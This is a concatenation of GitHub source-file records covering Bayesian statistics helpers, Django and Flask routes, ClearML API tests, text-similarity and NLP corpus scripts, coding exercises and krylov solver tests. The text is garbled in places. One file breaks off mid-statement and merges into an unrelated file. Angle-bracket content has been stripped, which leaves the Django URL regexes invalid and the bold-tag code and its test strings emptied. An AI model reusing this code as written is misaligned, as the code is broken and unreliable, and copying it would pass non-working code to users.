[\"__sample__\"]],\n        \"output_core_dims\": [[]],\n        \"join\": \"left\",\n    }\n    ufunc_kwargs = {\"n_dims\": 1}\n\n    if y.dtype.kind == \"i\" or y_hat.dtype.kind == \"i\":\n        y, y_hat = smooth_data(y, y_hat)\n\n    return _wrap_xarray_ufunc(\n        _loo_pit,\n        y,\n        y_hat,\n        log_weights,\n        ufunc_kwargs=ufunc_kwargs,\n        **kwargs,\n    )\n\n\ndef _loo_pit(y, y_hat, log_weights):\n    \"\"\"Compute LOO-PIT values.\"\"\"\n    sel = y_hat <= y\n    if np.sum(sel) > 0:\n        value = np.exp(_logsumexp(log_weights[sel]))\n        return min(1, value)\n    return 0\n\n\ndef weight_predictions(idatas, weights=None):\n    \"\"\"Generate weighted posterior predictive samples from multiple InferenceData and their weights.\n\n    
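Samples are drawn from the ``posterior_predictive`` group of each model in\n    proportion to its weight and concatenated along a common ``sample`` dimension.\n\n    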
Parameters\n ----------\n idatas : list[InferenceData]\n List of :class:`arviz.InferenceData` objects containing the groups `posterior_predictive`\n and `observed_data`. Observations should be the same for all InferenceData objects.\n weights : array-like, optional\n Individual weights for each model. Weights should be positive. If they do not sum up to 1,\n they will be normalized. Default, same weight for each model.\n Weights can be computed using many different methods including those in\n :func:`arviz.compare`.\n\n Returns\n -------\n idata: InferenceData\n Output InferenceData object with the groups `posterior_predictive` and `observed_data`.\n\n See Also\n --------\n compare : Compare models based on PSIS-LOO `loo` or WAIC `waic` cross-validation\n \"\"\"\n if len(idatas) < 2:\n raise ValueError(\"You should provide a list with at least two InferenceData objects\")\n\n if not all(\"posterior_predictive\" in idata.children for idata in idatas):\n raise ValueError(\n \"All the InferenceData objects must contain the `posterior_predictive` group\"\n )\n\n if not all(idatas[0].observed_data.equals(idata.observed_data) for idata in idatas[1:]):\n raise ValueError(\"The observed data should be the same for all InferenceData objects\")\n\n if weights is None:\n weights = np.ones(len(idatas)) / len(idatas)\n elif len(idatas) != len(weights):\n raise ValueError(\n \"The number of weights should be the same as the number of InferenceData objects\"\n )\n\n weights = np.array(weights, dtype=float)\n weights /= weights.sum()\n\n len_idatas = [\n idata.posterior_predictive.dims[\"chain\"] * idata.posterior_predictive.dims[\"draw\"]\n for idata in idatas\n ]\n\n if not all(len_idatas):\n raise ValueError(\"At least one of your idatas has 0 samples\")\n\n new_samples = (np.min(len_idatas) * weights).astype(int)\n\n new_idatas = [\n extract(idata, group=\"posterior_predictive\", num_samples=samples).reset_coords()\n for samples, idata in zip(new_samples, idatas)\n ]\n\n weighted_samples = DataTree.from_dict(\n {\n \"posterior_predictive\": xr.concat(new_idatas, dim=\"sample\"),\n \"observed_data\": idatas[0].observed_data,\n }\n )\n\n return weighted_samples\n","repo_name":"arviz-devs/arviz-stats","sub_path":"src/arviz_stats/base/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":60511,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"31186668722","text":"import json\nimport codecs\nimport gzip\nimport os\n\nimport argparse\nimport random\n\nfrom collections import defaultdict\n\nimport numpy as np\nfrom scipy import linalg\n\nuserIDCount = 0\nuserIDMap = {}\n\nitemIDCount = 0\nitemIDMap = {}\n\n\ndef getUserID(reviewerID):\n global userIDCount\n if reviewerID not in userIDMap:\n userIDMap[reviewerID] = userIDCount\n userIDCount = userIDCount + 1\n return userIDMap[reviewerID]\n\n\ndef getItemID(asin):\n global itemIDCount\n if asin not in itemIDMap:\n itemIDMap[asin] = itemIDCount\n itemIDCount = itemIDCount + 1\n return itemIDMap[asin]\n\n\ndef parse(path):\n \"\"\"parse json.gz file\"\"\"\n g = gzip.open(path, 'rb')\n for l in g:\n yield json.loads(l.decode())\n\n\ndef get_time_stamp(tmStr):\n Comma = tmStr.index(',')\n return int(tmStr[Comma+2:]+tmStr[0:2]+tmStr[3:Comma])\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='dataGenerator')\n\n parser.add_argument('--data_path', default=\"Video_Games.json.gz\", type=str, help='data path')\n parser.add_argument('--meta_data_path', 
default=\"meta_Video_Games.json.gz\", type=str, help='meta data path')\n parser.add_argument('--output_file', default=\"./Video_game_network.txt\", type=str, help='output file')\n parser.add_argument('--rumor_file', default=\"./rumor.txt\", type=str, help='output file')\n parser.add_argument('--item_bound', default=100, type=int, help='item bound')\n parser.add_argument('--user_bound', default=10, type=int, help='user bound')\n args = parser.parse_args()\n\n userCount=defaultdict(int)\n itemCount=defaultdict(int)\n\n for d in parse(args.data_path):\n userCount[d['reviewerID']] += 1\n itemCount[d['asin']] += 1\n\n user_buy = defaultdict(list) # 'user' -> [('item','time')]\n edges_weight = {} # item edge -> weight\n item_user = defaultdict(list) # {'item: ['user']}\n edge_num = 0\n for d in parse(args.meta_data_path):\n if itemCount[d['asin']] < args.item_bound:\n continue\n itemID = getItemID(d['asin'])\n for also_buy in d['also_buy']:\n if itemCount[also_buy] < args.item_bound:\n continue\n edges_weight[(itemID, getItemID(also_buy))] = 0\n\n for d in parse(args.data_path):\n if userCount[d['reviewerID']] 80:\n print(\"Congratulations! You won.\")\n\n# Example\n\nname = \"Gino\"\n\nif name == \"Gino\":\n print(\"Hi, Gino!\")\n\n# If/else statements\n\nname = \"Gino\"\n\nif name == \"Gino\":\n print(\"Hi, Gino!\")\nelse:\n print(\"Hey! Your name is NOT Gino.\")\n\n# If/elif/else statements\n\nx = 6\n\nif x > 3:\n print(\"Hello, World!\")\nelif x > 0:\n print(\"Python is awesome\")\nelse:\n print(\"Have an awesome day\")\n","repo_name":"estefaniacn/python-code-examples","sub_path":"11 - Conditionals/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"24015354681","text":"from django.conf.urls import url\nfrom .views import *\n\nurlpatterns = [\n url(r'^$', index, name='index'),\n url(r'^index$', index, name='index'),\n url(r'^user/register$', register, name='register'),\n url(r'^user/login$', user_login, name='login'),\n url(r'^user/logout$', user_logout, name='logout'),\n url(r'^user/(?P[0-9]+)/index$', show_user_profile, name='show_user_profile'),\n url(r'^user/edit$', edit_user_profile, name='edit_user_profile'),\n url(r'^user/password$', edit_user_password, name='edit_user_password'),\n url(r'^user/authority$', edit_user_authority, name='edit_user_authority'),\n\n url(r'^category/index$', show_categories, name='categories'),\n url(r'^category/add$', add_category, name='add_category'),\n url(r'^category/(?P[0-9]+)/index$', show_category, name='category_detail'),\n url(r'^category/(?P[0-9]+)/update$', update_category, name='update_category'),\n url(r'^category/(?P[0-9]+)/rank$', show_category_rank, name='category_rank'),\n\n url(r'^question/index$', show_questions, name='questions'),\n url(r'^question/add$', add_question, name='add_question'),\n url(r'^question/(?P[0-9]+)/index$', show_question, name='question_detail'),\n url(r'^question/(?P[0-9]+)/submit$', answer_submit, name='submit'),\n url(r'^question/(?P[0-9]+)/submission$', show_question_submissions, name='submission'),\n url(r'^question/(?P[0-9]+)/update$', update_question, name='update_question'),\n\n url(r'^submission/index$', show_submissions, name='submissions'),\n url(r'^submission/(?P[0-9]+)/index', show_submission, name='show_submission'),\n url(r'^submission/(?P[0-9]+)/edit', edit_submission, name='edit_submission'),\n\n url(r'^exam/index$', show_exams, name='exams'),\n 
url(r'^exam/(?P[0-9]+)/index', show_exam, name='exam_detail'),\n url(r'^exam/(?P[0-9]+)/question/(?P[0-9]+)/index',\n show_exam_question, name='exam_question_detail'),\n url(r'^exam/(?P[0-9]+)/question/(?P[0-9]+)/submit',\n exam_answer_submit, name='exam_submit'),\n url(r'^exam/(?P[0-9]+)/question/(?P[0-9]+)/submission',\n show_exam_question_submissions, name='exam_submission'),\n url(r'^exam/add$', add_exam, name='add_exam'),\n url(r'^exam/(?P[0-9]+)/update$', update_exam, name='update_exam'),\n url(r'exam/(?P[0-9]+)/rank$', show_exam_rank, name='exam_rank'),\n url(r'exam/generate$', generate_random_exam, name='generate_exam'),\n\n url(r'^test$', test, name='test')\n]\n","repo_name":"aKiteRunner/my_website","sub_path":"my_site/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4192508050","text":"from flask import Flask, render_template, request, redirect # added request\n\napp = Flask(__name__)\n# our index route will handle rendering our form\n@app.route('/')\ndef index():\n print(request.form)\n return render_template(\"index.html\")\n\n\n@app.route('/users', methods=['POST'])\ndef Dojo():\n print(\"Got Post Info\")\n print(request.form)\n name_from_form = request.form['name']\n location_from_form = request.form['location']\n languages_from_form = request.form['languages']\n commment_from = request.form['commment']\n return render_template(\"show.html\",commment=commment_from, name_on_template=name_from_form, languages_on_template=languages_from_form,location_from_form=location_from_form)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n","repo_name":"AlihTamrawe/Flask","sub_path":"flask/flask_fundamentals/Dojo_Survey/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30570169236","text":"from apiserver.apierrors import errors\nfrom apiserver.database.model import EntityVisibility\nfrom apiserver.tests.automated import TestService\nfrom apiserver.database.utils import id as db_id\n\n\nclass TestProjectsDelete(TestService):\n def new_task(self, type=\"testing\", **kwargs):\n return self.create_temp(\n \"tasks\", type=type, name=db_id(), **kwargs\n )\n\n def new_model(self, **kwargs):\n return self.create_temp(\"models\", uri=\"file:///a/b\", name=db_id(), labels={}, **kwargs)\n\n def new_project(self, name=None, **kwargs):\n return self.create_temp(\"projects\", name=name or db_id(), description=\"\", **kwargs)\n\n def test_delete_fails_with_active_task(self):\n project = self.new_project()\n self.new_task(project=project)\n res = self.api.projects.validate_delete(project=project)\n self.assertEqual(res.tasks, 1)\n self.assertEqual(res.non_archived_tasks, 1)\n with self.api.raises(errors.bad_request.ProjectHasTasks):\n self.api.projects.delete(project=project)\n\n def test_delete_with_archived_task(self):\n project = self.new_project()\n self.new_task(project=project, system_tags=[EntityVisibility.archived.value])\n res = self.api.projects.validate_delete(project=project)\n self.assertEqual(res.tasks, 1)\n self.assertEqual(res.non_archived_tasks, 0)\n self.api.projects.delete(project=project)\n\n def test_delete_fails_with_active_model(self):\n project = self.new_project()\n self.new_model(project=project)\n res = self.api.projects.validate_delete(project=project)\n self.assertEqual(res.models, 1)\n 
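# the new model is not archived, so validate_delete reports it and delete must fail\n        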
self.assertEqual(res.non_archived_models, 1)\n with self.api.raises(errors.bad_request.ProjectHasModels):\n self.api.projects.delete(project=project)\n\n def test_delete_with_archived_model(self):\n project = self.new_project()\n self.new_model(project=project, system_tags=[EntityVisibility.archived.value])\n res = self.api.projects.validate_delete(project=project)\n self.assertEqual(res.models, 1)\n self.assertEqual(res.non_archived_models, 0)\n self.api.projects.delete(project=project)\n\n def test_delete_dataset(self):\n name = \"Test datasets delete\"\n project = self.new_project(name=name)\n dataset = self.new_project(f\"{name}/.datasets/test dataset\", system_tags=[\"dataset\"])\n task = self.new_task(project=dataset, system_tags=[\"dataset\"])\n res = self.api.projects.validate_delete(project=project)\n self.assertEqual(res.datasets, 1)\n with self.api.raises(errors.bad_request.ProjectHasDatasets):\n self.api.projects.delete(project=project)\n\n self.api.tasks.delete(task=task)\n res = self.api.projects.validate_delete(project=project)\n self.assertEqual(res.datasets, 0)\n self.api.projects.delete(project=project)\n\n def test_delete_pipeline(self):\n name = \"Test pipelines delete\"\n project = self.new_project(name=name)\n pipeline = self.new_project(f\"{name}/.pipelines/test pipeline\", system_tags=[\"pipeline\"])\n task = self.new_task(project=pipeline, type=\"controller\", system_tags=[\"pipeline\"])\n res = self.api.projects.validate_delete(project=project)\n self.assertEqual(res.pipelines, 1)\n with self.api.raises(errors.bad_request.ProjectHasPipelines):\n self.api.projects.delete(project=project)\n\n self.api.tasks.edit(task=task, system_tags=[EntityVisibility.archived.value])\n res = self.api.projects.validate_delete(project=project)\n self.assertEqual(res.pipelines, 0)\n self.api.projects.delete(project=project)\n","repo_name":"allegroai/clearml-server","sub_path":"apiserver/tests/automated/test_project_delete.py","file_name":"test_project_delete.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","stars":334,"dataset":"github-code","pt":"21"} +{"seq_id":"6496232036","text":"from collections import defaultdict\nimport re\n\nfrom text_comparer.similarity import similarity\n\n\ndef word_frequencies(word_vector):\n \"\"\"What percent of the time does each word in the vector appear?\n\n Returns a dictionary mapping each word to its frequency.\n\n \"\"\"\n num_words = len(word_vector)\n frequencies = defaultdict(float)\n for word in word_vector:\n frequencies[word] += 1.0 / num_words\n\n return dict(frequencies)\n\n\ndef compare_vectors(word_vector1, word_vector2):\n \"\"\"Numerical similarity between lists of words. 
Higher is better.\n\n    Uses cosine similarity.\n    Result range: 0 (bad) - 1 (uses all the same words in the same proportions)\n\n    \"\"\"\n    all_words = list(set(word_vector1).union(set(word_vector2)))\n    frequency_dict1 = word_frequencies(word_vector1)\n    frequency_dict2 = word_frequencies(word_vector2)\n\n    frequency_vector1 = [frequency_dict1.get(word, 0) for word in all_words]\n    frequency_vector2 = [frequency_dict2.get(word, 0) for word in all_words]\n\n    return similarity(frequency_vector1, frequency_vector2)\n\n\ndef vectorize_text(text):\n    \"\"\"Takes in text, processes it, and vectorizes it.\"\"\"\n\n    def remove_punctuation(text):\n        \"\"\"Removes special characters from text.\"\"\"\n        return re.sub('[,.?\";:\\\-!@#$%^&*()]', '', text)\n\n    def remove_common_words(text_vector):\n        \"\"\"Removes the 50 most common words in UK English.\n\n        source: http://www.bckelk.ukfsn.org/words/uk1000n.html\n\n        \"\"\"\n        common_words = set(['the', 'and', 'to', 'of', 'a', 'I', 'in', 'was',\n            'he', 'that', 'it', 'his', 'her', 'you', 'as', 'had', 'with',\n            'for', 'she', 'not', 'at', 'but', 'be', 'my', 'on', 'have', 'him',\n            'is', 'said', 'me', 'which', 'by', 'so', 'this', 'all', 'from',\n            'they', 'no', 'were', 'if', 'would', 'or', 'when', 'what', 'there',\n            'been', 'one', 'could', 'very', 'an', 'who'])\n        return [word for word in text_vector if word not in common_words]\n\n    text = text.lower()\n    text = remove_punctuation(text)\n    words_list = text.split()\n    words_list = remove_common_words(words_list)\n\n    return words_list\n\n\ndef compare_texts(text1, text2):\n    \"\"\"How similar are the two input paragraphs?\"\"\"\n    return compare_vectors(vectorize_text(text1), vectorize_text(text2))\n","repo_name":"sergeio/text_comparer","sub_path":"text_comparer/vectorizer.py","file_name":"vectorizer.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"}
{"seq_id":"24061515080","text":"# -----------------------------------------\n# My Solution\n#\n# Time Complexity: O(d(m + n) + nlog(n) + n)\n# Space Complexity: O(n)\n# -----------------------------------------\n# d := len(dict), m := max(len(word) for word in dict), n := len(string)\n# Note: This solution requires KMP pattern matching algorithm\nfrom collections import deque\n\ndef kmp_matched_indexes(haystack, needle):\n    if not needle:\n        return []\n    # generate next_arr array, need O(n) time\n    i, j = -1, 0\n    next_arr = [-1] * len(needle)\n    while j < len(needle) - 1:\n        # needle[i] stands for prefix, needle[j] stands for postfix\n        if i == -1 or needle[i] == needle[j]:\n            i += 1\n            j += 1\n            next_arr[j] = i\n        else:\n            i = next_arr[i]\n    # check through the haystack using next_arr, need O(m) time\n    matched_indexes = []\n    i = 0\n    while i < len(haystack):\n        j = 0\n        while i < len(haystack) and j < len(needle):\n            if j == -1 or haystack[i] == needle[j]:\n                i += 1\n                j += 1\n            else:\n                j = next_arr[j]\n        if j == len(needle):\n            matched_indexes.append((i - j, i - j + len(needle) - 1))\n\n    return matched_indexes\n\ndef add_bold_tag(string, dict):\n    if len(dict) == 0:\n        return string\n\n    matched_intervals = []\n    for word in dict:\n        for interval in kmp_matched_indexes(string, word):\n            matched_intervals.append(interval)\n    if len(matched_intervals) == 0:\n        return string\n\n    matched_intervals = deque(sorted(matched_intervals))\n    interval_pointer = 0\n    while interval_pointer < len(matched_intervals) - 1:\n        curr_interval, next_interval = matched_intervals[interval_pointer], matched_intervals[interval_pointer + 1]\n        if curr_interval[0] <= next_interval[0] <= curr_interval[1] + 1:\n            matched_intervals[interval_pointer + 1] = (curr_interval[0], max(curr_interval[1], next_interval[1]))\n            matched_intervals.popleft()\n        else:\n            interval_pointer += 1\n\n    bold_tags_string = \"\"\n    interval_pointer = 0\n    for string_index in range(len(string)):\n        curr_interval = matched_intervals[interval_pointer] if interval_pointer < len(matched_intervals) else None\n        if curr_interval is None or string_index not in curr_interval:\n            bold_tags_string += string[string_index]\n        elif string_index == curr_interval[0]:\n            bold_tags_string += \"<b>\" + string[string_index]\n        elif string_index == curr_interval[1]:\n            bold_tags_string += string[string_index] + \"</b>\"\n            interval_pointer += 1\n    return bold_tags_string\n\nprint(add_bold_tag(\"abcxyz123\", [\"abc\",\"123\"]) == \"<b>abc</b>xyz<b>123</b>\")\nprint(add_bold_tag(\"aaabbcc\", [\"aaa\", \"aab\", \"bc\"]) == \"<b>aaabbc</b>c\")\n","repo_name":"DaMinaup6/algorithm-exercises","sub_path":"leetcode/medium/616_add_bold_tag_in_string.py","file_name":"616_add_bold_tag_in_string.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"31818033732","text":"import re\nimport os\nimport nltk\nfrom nltk import word_tokenize, pos_tag\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom xml.etree import ElementTree\nfrom collections import defaultdict\n\n\ndef eachFile(filepath):\n    filenames=[]\n    pathDir = os.listdir(filepath)\n    for allDir in pathDir:\n        child = os.path.join('%s//%s' % (filepath, allDir))\n        filenames.append(child)\n    return filenames\n\n\ndef sentence_split(str_sentence):\n    \"\"\"\n    Split text into sentences.\n    Args:\n        str_sentence: str, text content\n    Returns:\n        list_ret: list, list of the split sentences\n    \"\"\"\n    clean_con = re.sub('<[^>]*>', '', str_sentence)\n    # clean_con = clean_con.replace('\\n','')\n    list_ret = []\n    tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')\n    for s_str in clean_con.split('\\n'):\n        s = tokenizer.tokenize(s_str)\n        list_ret = list_ret + s\n    # print(list_ret)\n    return list_ret\n\n\ndef get_extend_attrib(source_path, offset, text):\n    \"\"\"\n    Get the sentence containing the event trigger, its POS tags, relative position, etc.\n    Args:\n        source_path: str, path of the source text\n        offset: int, position of the trigger word in the source text\n        text: str, trigger word\n    returns:\n        sentence: str, the sentence\n        tags: str, POS tags\n        position: int, relative position\n    \"\"\"\n    context = open(source_path, 'r', encoding='utf-8').read()\n    tempcon = context[0:offset]\n    sent_index = len(sentence_split(tempcon)) - 1\n    startoff, endoff = 0, 0  # start and end positions of the sentence\n    for index in range(offset, -1, -1):  # search backwards\n        if context[index] in ['\"', '.', '!', '。', '?', '\\n', '>']:\n            startoff = index + 1\n            break\n    for index in range(offset, len(context), 1):  # search forwards\n        if context[index] in ['.', '!', '。', '?', '\\n', '<']:\n            endoff = index + 1\n            break\n    sentence = context[startoff: endoff]\n    sentence = sentence.strip('\\n')\n    sentence = sentence.lower().replace('↑', ':')\n    words = word_tokenize(sentence)  # tokenize\n    position = 0\n    try:\n        position = words.index(word_tokenize(text)[0])  # position of the trigger in the sentence; the trigger is tokenized first in case it consists of several words, and the position of its first word is used\n    except Exception:\n        text = word_tokenize(text)[0]\n        for index in range(len(words)):\n            if text in words[index]:\n                position = index\n    tagged = pos_tag(words)\n    tags = list(map(lambda x: x[1], tagged))\n    tag = tags[position]\n    tags = ' '.join(tags)  # POS tagging\n\n    return sentence, tags, position, sent_index, tag\n\n\ndef get_eminfo(ere_path, source_path):\n    eachfileems = []\n    tree = ElementTree.parse(ere_path)\n    root = tree.getroot()\n\n    for hoppernode in root.iter('hopper'):\n        hopper1 = 
hoppernode.get('id')\n for eventnode in hoppernode.iter('event_mention'):\n eventmention = defaultdict(dict)\n eventmention['hopper_id'] = hopper1\n arg_role = []\n id1 = eventnode.get('id')\n eventmention['em_id'] = id1\n\n type1 = eventnode.get('type')\n eventmention['type'] = type1\n\n subtype1 = eventnode.get('subtype')\n eventmention['subtype'] = subtype1\n\n realis1 = eventnode.get('realis')\n eventmention['realis'] = realis1\n\n triggernode = eventnode.find('trigger')\n source1 = triggernode.get('source')\n eventmention['source'] = source1\n\n offset1 = triggernode.get('offset')\n trigger1 = triggernode.text\n\n lem = WordNetLemmatizer()\n trigger_etyma1 = lem.lemmatize(trigger1, \"v\")\n eventmention['trigger'] = trigger_etyma1\n\n sentence, tags, position, sent_index, tag = get_extend_attrib(source_path, int(offset1), trigger1)\n #print(tags.split(' '))\n eventmention['sentence'] = sentence\n eventmention['tags'] = tags\n eventmention['position'] = position\n eventmention['sent_index'] = sent_index\n eventmention['tag'] = tag\n\n for em_arg in eventnode.iter('em_arg'):\n arg1 = em_arg.text\n role1 = em_arg.get('role')\n arg_role.append((arg1, role1))\n eventmention['arg_role'] = arg_role\n eachfileems.append(eventmention)\n\n return eachfileems\n\n\ndef ems2txt(eachfileems, txtpath):\n f = open(txtpath, 'w', encoding='utf-8')\n for em in eachfileems:\n f.write(em['source'] + '|' + em['hopper_id'] + '|' + em['em_id'] + '|' + em['type'] + '|' +\n em['subtype'] + '|' + em['realis'] + '|' + em['trigger'] + '|' + str(em['position']) + '|'\n + str(em['sent_index']) + '|' + em['sentence'] + '|' + em['tag'] + '|' + em['tags'] + '|')\n '''for item in em['tags']:\n f.write(item + ' ')\n f.write('|')'''\n for item in em['arg_role']:\n f.write(item[0] + '+' + item[1] + '#')\n f.write('\\n')\n f.close()\n\n\nere_paths = eachFile('G:\\ldc17\\eresour\\ere')\nsource_paths = eachFile('G:\\ldc17\\eresour\\source')\nn = len(ere_paths)\nfor i in range(n):\n ere_path = ere_paths[i]\n source_path = source_paths[i]\n name = os.path.basename(source_path)\n name = name[:-4] + '.txt'\n into_path = \"G:\\\\ldc17\\\\fileems1\" + '\\\\' + name\n #print(into_path)\n evs = get_eminfo(ere_path, source_path)\n print(evs)\n ems2txt(evs, into_path)\n","repo_name":"daiqianwen/projects","sub_path":"build_corpus.py","file_name":"build_corpus.py","file_ext":"py","file_size_in_byte":5452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72547506988","text":"objeto_procurado = input()\r\nlista_itens = input()\r\nlista_itens = lista_itens.split(', ')\r\n# print(lista_itens)\r\n# print(len(lista_itens))\r\nitens_repetidos = []\r\ncoeficiente_erro = float()\r\nqt_item_mais_repetido = 0\r\nitens_diferentes = []\r\nnao_repetidos = []\r\nitens_iguais_print = []\r\n\r\nfor i in lista_itens:\r\n if i not in nao_repetidos:\r\n nao_repetidos.append(i)\r\n else:\r\n itens_repetidos.append(i)\r\n \r\nfor k in itens_repetidos:\r\n if k not in itens_diferentes:\r\n itens_diferentes.append(k)\r\n print(f'Após análises, percebi que {str(k)} foi coletado mais de uma vez...')\r\n\r\n else:\r\n itens_iguais_print.append(k)\r\n\r\nitens_repetidos = []\r\nfor i in range(len(lista_itens)):\r\n qt_itens_repetidos = 0\r\n if lista_itens[i] not in itens_repetidos:\r\n for j in range(i+1, len(lista_itens)):\r\n if lista_itens[i] == lista_itens[j]:\r\n qt_itens_repetidos+=1\r\n itens_repetidos.append(lista_itens[i])\r\n \r\n if qt_item_mais_repetido <= qt_itens_repetidos:\r\n 
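# A self-contained illustration of the NLTK calls the corpus builder above
# leans on: tokenize a sentence, POS-tag it, and read off the tag at a
# trigger word's position. Assumes the punkt and perceptron-tagger models
# have already been fetched with nltk.download(); the sentence is made up.
from nltk import word_tokenize, pos_tag

sentence = "the troops attacked the city at dawn"
words = word_tokenize(sentence)
tagged = pos_tag(words)              # [('the', 'DT'), ('troops', 'NNS'), ...]
position = words.index("attacked")
print(tagged[position])              # ('attacked', 'VBD')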
qt_item_mais_repetido = qt_itens_repetidos\r\n \r\n\r\n\r\nif len(itens_repetidos) > 0:\r\n coeficiente_erro = (len(lista_itens)) / (qt_item_mais_repetido+1)\r\n print('Certo, o coeficiente de erros de viagens interdimensionais é {:.2f}'.format(coeficiente_erro))\r\n\r\n\r\nif objeto_procurado in lista_itens and (objeto_procurado not in itens_repetidos): \r\n print(f'Você encontrou o item necessário para me ajudar a voltar para minha dimensão! Finalmente voltarei para Gravity Falls!')\r\nelse: \r\n print(f'Que pena, você não encontrou o item necessário para me ajudar a voltar para minha dimensão...')\r\n \r\nprint('(Como prometido, você retorna ao DA do CIn. Mas, por razões desconhecidas, você se esquece do ocorrido)')\r\nprint('O walkie-talkie está na sua mão. Depois de um tempo, você diz: \"Que aparelho velho!\"')\r\nprint('(Após pensar sobre o que fazer com o walkie-talkie, você resolve jogá-lo no banheiro do CIn)')\r\n\r\n\r\n\r\n\r\n","repo_name":"gabrielrochass/Python-Questions","sub_path":"python/List3_lists/question5.py","file_name":"question5.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12461334521","text":"import numpy as np\nimport pytest\nimport scipy.sparse\nimport scipy.sparse.linalg\n\nimport krylov\n\n\n# separate out the householder test because it doesn't support non-vector right-hand\n# sides yet.\n@pytest.mark.parametrize(\"b_shape\", [(5,), (5, 1)])\ndef test_orthogonalization_householder(b_shape):\n # build Hermitian, indefinite matrix\n n = b_shape[0]\n a = np.array(np.linspace(1.0, 2.0, n), dtype=complex)\n a[-1] = 1e-3\n A = np.diag(a)\n A[-1, 0] = 10j\n A[0, -1] = -10j\n b = np.ones(b_shape, dtype=complex)\n\n ortho = \"householder\"\n\n _, info = krylov.gmres(A, b, tol=1.0e-12, ortho=ortho)\n assert info.success\n assert np.all(info.resnorms[-1] <= 1.0e-11)\n\n\n@pytest.mark.parametrize(\"solver\", [krylov.cg, krylov.minres, krylov.gmres])\n@pytest.mark.parametrize(\"b_shape\", [(5,), (5, 1), (5, 3)])\ndef test_explicit_residual(solver, b_shape):\n a = np.linspace(1.0, 2.0, b_shape[0])\n a[-1] = 1e-2\n A = np.diag(a)\n b = np.ones(b_shape)\n\n _, info = solver(A, b, tol=1.0e-7)\n assert np.all(info.resnorms[-1] < 1.0e-7)\n\n\n@pytest.mark.parametrize(\"solver\", [krylov.cg])\n@pytest.mark.parametrize(\"b_shape\", [(5,), (5, 1), (5, 3)])\ndef test_return_arnoldi(solver, b_shape):\n a = np.linspace(1.0, 2.0, b_shape[0])\n a[-1] = 1e-2\n A = np.diag(a)\n b = np.ones(b_shape)\n\n _, info = solver(A, b, tol=1.0e-7, return_arnoldi=True)\n assert np.all(info.resnorms[-1] < 1.0e-7)\n\n\n# @pytest.mark.parametrize(\"solver\", [krylov.cg, krylov.minres, krylov.gmres])\n# def test_final_error_norm(solver):\n# np.random.seed(0)\n# A = np.random.rand(5, 5)\n# b = np.random.rand(5)\n# exact = np.linalg.solve(A, b)\n#\n# ls = krylov.linear_system.LinearSystem(\n# A=A,\n# b=b,\n# exact_solution=exact,\n# )\n# sol, info = solver(A, b, tol=1.0e-12)\n#\n# # final error norm correct?\n# # (if exact_solution was provided)\n# if ls.exact_solution is not None:\n# assert_almost_equal(\n# info.errnorms[-1],\n# krylov.utils.norm(\n# krylov.utils.shape_vec(ls.exact_solution)\n# - krylov.utils.shape_vec(sol.xk),\n# inner=ls.inner,\n# ),\n# )\n\n\n@pytest.mark.parametrize(\"solver\", [krylov.cg, krylov.minres, krylov.gmres])\ndef test_exact_solution_as_initial_guess(solver):\n A = np.diag([1.0e-3] + list(range(2, 11)))\n b = np.ones(10)\n x0 = np.linalg.solve(A, b)\n\n _, info = 
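# The duplicate bookkeeping in the exercise above (nao_repetidos /
# itens_repetidos plus the nested counting loops) can be cross-checked with
# collections.Counter; a sketch only, separate from the exercise's required
# output format, with made-up items.
from collections import Counter

items = "pato, pato, ganso, pato".split(", ")
counts = Counter(items)
repeated = [item for item, n in counts.items() if n > 1]
print(repeated)                       # ['pato']
print(counts.most_common(1)[0][1])    # 3  (count of the most repeated item)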
solver(A, b, x0=x0)\n assert len(info.resnorms) == 1\n\n\n@pytest.mark.parametrize(\"solver\", [krylov.cg, krylov.minres, krylov.gmres])\ndef test_m(solver):\n a = np.linspace(1.0, 2.0, 5)\n A = np.diag(a)\n A[0, 0] = 1e-2\n b = np.ones(5)\n M = np.diag(a)\n _, info = solver(A, b, M=M, tol=1.0e-12)\n assert info.resnorms[-1] <= 1.0e-12\n\n\n@pytest.mark.parametrize(\"solver\", [krylov.cg, krylov.minres, krylov.gmres])\ndef test_ml(solver):\n a = np.linspace(1.0, 2.0, 5)\n A = np.diag(a)\n A[0, 0] = 1e-2\n b = np.ones(5)\n M = np.diag(a)\n _, info = solver(A, b, Ml=M, tol=1.0e-12)\n assert info.resnorms[-1] <= 1.0e-12\n\n\n@pytest.mark.parametrize(\"solver\", [krylov.minres, krylov.gmres])\ndef test_mr(solver):\n a = np.linspace(1.0, 2.0, 5)\n A = np.diag(a)\n A[0, 0] = 1e-2\n b = np.ones(5)\n M = np.diag(a)\n _, info = solver(A, b, Mr=M, tol=1.0e-12)\n assert info.resnorms[-1] <= 1.0e-12\n\n\n@pytest.mark.parametrize(\n \"method, ref\",\n [\n (krylov.cg, [1004.1873775173957, 1000.0003174916551, 999.9999999997555]),\n (krylov.gmres, [1004.1873724888546, 1000.0003124630923, 999.999994971191]),\n (krylov.minres, [1004.187372488912, 1000.0003124632159, 999.9999949713145]),\n ],\n)\n@pytest.mark.parametrize(\"shape\", [(100,), (100, 1)])\ndef test_solvers(method, ref, shape):\n tol = 1.0e-11\n n = shape[0]\n A = 